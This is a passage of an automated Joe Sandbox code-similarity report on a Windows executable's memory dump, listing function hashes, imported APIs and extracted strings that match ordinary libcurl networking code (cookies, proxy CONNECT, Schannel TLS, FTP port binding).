                                      • Opcode ID: d0d708359427caa48cbbf42e49293064df08075f2b55c148ef143d195b9a0e66
                                      • Instruction ID: d84b2e07453a614a21702497ef10c2ee7fcdaaf6bb2069c33bac1627f64f0177
                                      • Opcode Fuzzy Hash: d0d708359427caa48cbbf42e49293064df08075f2b55c148ef143d195b9a0e66
                                      • Instruction Fuzzy Hash: 96922E65A08B4696EB14AF25F8506B8E7A0FF4CB94F880071DE5E47794DF3CD048E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$strchr$callocmalloc$__acrt_iob_func_time64fclosefopenstrcmpstrncmpstrtoll
                                      • String ID: #HttpOnly_$%1023[^;=] =%4999[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced$TRUE$domain$expires$httponly$localhost$max-age$none$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                      • API String ID: 995170338-2893117712
                                      • Opcode ID: 36ed42e4d657f7b36d7ef93ed79e775cdf2d0c13f779136442f5aa4bca992c45
                                      • Instruction ID: 51756b7788a2bf245d480e805835f14a12d0f065ea8fe1da3cbf1e1621c5e273
                                      • Opcode Fuzzy Hash: 36ed42e4d657f7b36d7ef93ed79e775cdf2d0c13f779136442f5aa4bca992c45
                                      • Instruction Fuzzy Hash: D482B321A0DB4682FF24AB21A450279E7A4BF5D780F884531DE6E477D1DF3CF448A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$callocstrchr
                                      • String ID: %s%s%s:%hu$%s:%hu$1.0$1.1$CONNECT$CONNECT %s HTTP/%s%s%s%s%s$CONNECT phase completed!$CONNECT responded chunked$CONNECT response too large!$Connect me again please$Connection:$Content-Length:$Establish HTTP proxy tunnel to %s:%hu$Failed sending CONNECT to proxy$HTTP/1.%d %d$Host:$Host: %s$Ignore %I64d bytes of response-body$Ignore chunked response-body$Ignoring Content-Length in CONNECT %03d response$Ignoring Transfer-Encoding in CONNECT %03d response$Proxy CONNECT aborted$Proxy CONNECT aborted due to timeout$Proxy CONNECT connection closed$Proxy replied OK to CONNECT request$Proxy-Connection:$Proxy-Connection: Keep-Alive$Proxy-authenticate:$Received HTTP code %d from proxy after CONNECT$Transfer-Encoding:$User-Agent:$WWW-Authenticate:$chunk reading DONE$chunked$close
                                      • API String ID: 1511779358-154568956
                                      • Opcode ID: dc7cc8890859ac3db23d15ba6f3797188adf4fd4f99d112801b590328478e53b
                                      • Instruction ID: a0a9b2cddf3638e995fb8a6e3dcab82daecbb4a4af423de66c93d0ceb06c3651
                                      • Opcode Fuzzy Hash: dc7cc8890859ac3db23d15ba6f3797188adf4fd4f99d112801b590328478e53b
                                      • Instruction Fuzzy Hash: 0E529F61A09B8686EB64FB21A5502B9F390FF49794F844136CB6D072D1DF3CE548E3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast$AddressProc$File$FreeLibraryRead$CleanupHandleMultipleNamedObjectsPeekPipeStartupTypeWait__swprintf_lcallocstrncpy
                                      • String ID: FreeLibrary(wsock2) failed (%u)$Time-out$WS2_32.DLL$WSACloseEvent$WSACloseEvent failed (%d)$WSACreateEvent$WSACreateEvent failed (%d)$WSAEnumNetworkEvents$WSAEnumNetworkEvents failed (%d)$WSAEventSelect$WSAStartup failed (%d)$failed to find WSACloseEvent function (%u)$failed to find WSACreateEvent function (%u)$failed to find WSAEnumNetworkEvents function (%u)$failed to find WSAEventSelect function (%u)$failed to load WS2_32.DLL (%u)$insufficient winsock version to support telnet
                                      • API String ID: 1117252068-3753229889
                                      • Opcode ID: de5caf042a76388d68ddda5f38a72459d3cc904c31f9323014297b0b27ecbf16
                                      • Instruction ID: a91e48f0d636a36c9fb28951fa3b2a056fd3c875aefaab57881adeeeee231465
                                      • Opcode Fuzzy Hash: de5caf042a76388d68ddda5f38a72459d3cc904c31f9323014297b0b27ecbf16
                                      • Instruction Fuzzy Hash: 6E02BF21B0DB4286EB18AB65E45127AE3A0BF4CB94F840135DE6E477D4DF3CE448E7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast$getsocknamestrchr$_cwprintf_s_lfreehtonsstrtoul$__swprintf_lbindcalloclistenstrncpy
                                      • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                      • API String ID: 2373786591-2383553807
                                      • Opcode ID: e361aefa0f85aa2a297509a163f50c228a431893c879840481aaccef3b2f8d77
                                      • Instruction ID: f18aecb1856a647d2283e7411403cfc53e827f17ce63ea328f18c11cb26a58c2
                                      • Opcode Fuzzy Hash: e361aefa0f85aa2a297509a163f50c228a431893c879840481aaccef3b2f8d77
                                      • Instruction Fuzzy Hash: 4012C561A0C68282FB54FB21E4002B9E3A1EF58790FC44031DA6E476D5DE7CE54DF7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: realloc$ErrorLastrecv
                                      • String ID: schannel: Curl_read_plain returned CURLE_AGAIN$schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renogotiate, an error is pending$schannel: can't renogotiate, encrypted data available$schannel: client wants to read %zu bytes$schannel: decrypted data added: %zu$schannel: decrypted data buffer: offset %zu length %zu$schannel: decrypted data cached: offset %zu length %zu$schannel: decrypted data length: %lu$schannel: decrypted data returned %zu$schannel: encdata_buffer resized %zu$schannel: encrypted data buffer: offset %zu length %zu$schannel: encrypted data cached: offset %zu length %zu$schannel: encrypted data got %zd$schannel: encrypted data length: %lu$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: schannel_recv cleanup$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                      • API String ID: 2192408281-1393157870
                                      • Opcode ID: b9ee442c326a8007643b060b66e31e147628f45ad83f91821a604472ac44f5e2
                                      • Instruction ID: 35546615ed46e53969c58f342ec668caf22f1b7da406eae0b5d363f70c3b0207
                                      • Opcode Fuzzy Hash: b9ee442c326a8007643b060b66e31e147628f45ad83f91821a604472ac44f5e2
                                      • Instruction Fuzzy Hash: A022C961B08B8697EB59EB21E1803E9E364EF4C748F904132CE6D176C5DE7CE548E3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D1E71E
                                      • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E77F
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E7B4
                                      • isalpha.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E7D2
                                      • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E7DF
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D1E828
                                      • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E849
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E8B4
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E8C9
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D1E8DD
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E94C
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E995
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E9B5
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E9CB
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1EA4D
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1EAA0
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1EAE4
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1EAF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$strchr$isxdigit$isalphastrncmpstrtol
                                      • String ID: %25$://$Invalid IPv6 address format$No valid port number in proxy string (%s)$Please URL encode %% as %%25, see RFC 6874.$Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$http:$https$socks$socks4$socks4a$socks5$socks5h
                                      • API String ID: 2964755728-741215929
                                      • Opcode ID: 01894c9e9f79090ad96b47a2a91c4d7f481438575ce4b6f84746349730f78ecc
                                      • Instruction ID: f1d2f539cb3b27a175ef41b194c9591f9f94dc428d03ece8f6c8273db1bcf3b6
                                      • Opcode Fuzzy Hash: 01894c9e9f79090ad96b47a2a91c4d7f481438575ce4b6f84746349730f78ecc
                                      • Instruction Fuzzy Hash: 92F18461A0CA5285FB11AB71E8542B9E790BF5CBA4FC84531CE6D476C1DF3CE448E3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcfreemalloc
                                      • String ID: Microsoft Unified Security Protocol Provider$Unrecognized parameter passed via CURLOPT_SSLVERSION$http/1.1$http/1.1$ntdll$schannel: ALPN, offering %s$schannel: AcquireCredentialsHandle failed: %s$schannel: SNI or certificate check failed: %s$schannel: SSL/TLS connection with %s port %hu (step 1/3)$schannel: WinSSL version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: checking server certificate revocation$schannel: disabled server certificate revocation checks$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: incremented credential handle refcount = %d$schannel: initial InitializeSecurityContext failed: %s$schannel: re-using existing credential handle$schannel: sending initial handshake data: sending %lu bytes...$schannel: sent initial handshake data: sent %zd bytes$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.$wine_get_version
                                      • API String ID: 2353189633-3298331532
                                      • Opcode ID: 6a543bd661bb61a39d843e8353e64689141afbc20a07f022812279e442afd386
                                      • Instruction ID: 567bbfce03cd23219046380da28303305978116a48e0e48722d823cfa4463eb5
                                      • Opcode Fuzzy Hash: 6a543bd661bb61a39d843e8353e64689141afbc20a07f022812279e442afd386
                                      • Instruction Fuzzy Hash: 8212D272A08B8185EB10AF61E4443A9F7A4FF48794F800136DA6D5B7D5DF3CE408E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: htons$ErrorLastbindinet_ptonstrncmp$getsockname
                                      • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
                                      • API String ID: 3536004664-3110688763
                                      • Opcode ID: c7df2ba5d5bfe18d158561e9dc2ed3a9453250391aee9920f7eac1ea2907e431
                                      • Instruction ID: a9bd2dc2cf14f2f05316f40720a6525d8281ffcd0a11476df036b4ead886b742
                                      • Opcode Fuzzy Hash: c7df2ba5d5bfe18d158561e9dc2ed3a9453250391aee9920f7eac1ea2907e431
                                      • Instruction Fuzzy Hash: C9A1C122B19A5285FB14EB25D4406BAE760BF4C794F841031E92E47AE9DF7CD10CE768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D20456
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D2047A
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D204A3
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D204CF
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D204F8
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D2050D
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D20522
                                        • Part of subcall function 00007FF7F8D1D644: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7F8D20410,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7F8D1D677
                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D20637
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D20668
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D206A6
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20C32
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc$callocstrchrtolower
                                      • String ID: %s://%s$Found connection %ld, with requests in the pipe (%zu)$NTLM picked AND auth done set, clear picked!$NTLM-proxy picked AND auth done set, clear picked!$No connections available in cache$No connections available.$No more connections allowed to host: %d$Re-using existing connection! (#%ld) with %s %s$We can reuse, but we want a new connection anyway$host$proxy
                                      • API String ID: 2860663014-3132639422
                                      • Opcode ID: 07b9314ba3f292ae291e9615deaaccedbf15a86c7b7902e6b4c9c834b86602e4
                                      • Instruction ID: 16b317b5e7b8142592e804009a5b1290ad86f75891ff7115d29d3f8c15372533
                                      • Opcode Fuzzy Hash: 07b9314ba3f292ae291e9615deaaccedbf15a86c7b7902e6b4c9c834b86602e4
                                      • Instruction Fuzzy Hash: 90628F62609B8286EB58EB21A4503B9E7A0FF49B84F844131CFAD077D1DF3CE459D398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID: Digest$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx
                                      • API String ID: 2190258309-3931579343
                                      • Opcode ID: 0a62f6e9b3d73c8dc0a02518f2e8254e1d63863cd834b3974f7d50c7c5863ee5
                                      • Instruction ID: ea71d6cbfa6a7755b76773415827aa47aff3f23d7b5351f81c9b80645aeb7bc4
                                      • Opcode Fuzzy Hash: 0a62f6e9b3d73c8dc0a02518f2e8254e1d63863cd834b3974f7d50c7c5863ee5
                                      • Instruction Fuzzy Hash: 0A123D35A09B8686EB24AF62F850269F7A4FF4CB84F880075DE5E47794DF3CE4089794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isalnumisalphaisdigit
                                      • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
                                      • API String ID: 1074301303-988243589
                                      • Opcode ID: 168dd7722daf38918aebbc7b36df1de1bd19216b4c5df98a771307de2e75f261
                                      • Instruction ID: a83905fefeddf91a936c6bf829a010724de1905189eec8cb8278cb3d53e36d91
                                      • Opcode Fuzzy Hash: 168dd7722daf38918aebbc7b36df1de1bd19216b4c5df98a771307de2e75f261
                                      • Instruction Fuzzy Hash: A6F1D532F08A028AFB14EB7494102BCF6A5AF0C778F905236DE3D576D4DF3999499394
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CAA
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CB2
                                      • __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CC9
                                      • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CD5
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CE7
                                      • FormatMessageA.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F8D12D23
                                      • __swprintf_l.LIBCMT ref: 00007FF7F8D12D43
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D91
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D9C
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DA5
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$FormatMessage__swprintf_l__sys_nerrstrerrorstrncpy
                                      • String ID: Unknown error %d (%#x)
                                      • API String ID: 3027987245-2414550090
                                      • Opcode ID: a39b553896adf3e026e5dbb80f190267936aadc1b2c147f1f8515ef7b5e6914a
                                      • Instruction ID: 97c4dcd6aa1525c9c1f70aad86781d398d48ba77724f13c36f11b2886099dded
                                      • Opcode Fuzzy Hash: a39b553896adf3e026e5dbb80f190267936aadc1b2c147f1f8515ef7b5e6914a
                                      • Instruction Fuzzy Hash: F631A421A0CA4382FB14BF61E404379E751AF9CBA4F880034C96E47BD5CF7DE448A7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
